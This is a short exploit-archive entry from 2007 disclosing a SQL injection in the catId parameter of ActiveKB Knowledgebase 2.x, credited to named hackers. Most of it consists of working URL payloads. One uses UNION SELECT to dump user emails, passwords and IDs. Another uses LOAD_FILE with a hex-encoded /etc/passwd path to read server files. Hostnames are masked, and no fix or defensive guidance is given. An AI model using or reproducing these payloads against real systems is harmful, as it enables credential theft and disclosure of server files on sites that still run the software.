ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability
# Published : 2007-09-26
# Author : Luna-Tic/XTErner
# Previous Title : fuzzylime cms <= 3.0 Local File Inclusion Vulnerability
# Next Title : DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities

ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers 

Vendor:www.interspire.com/activekb/

License:sharewere

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*

# www.Syue.com [2007-09-26]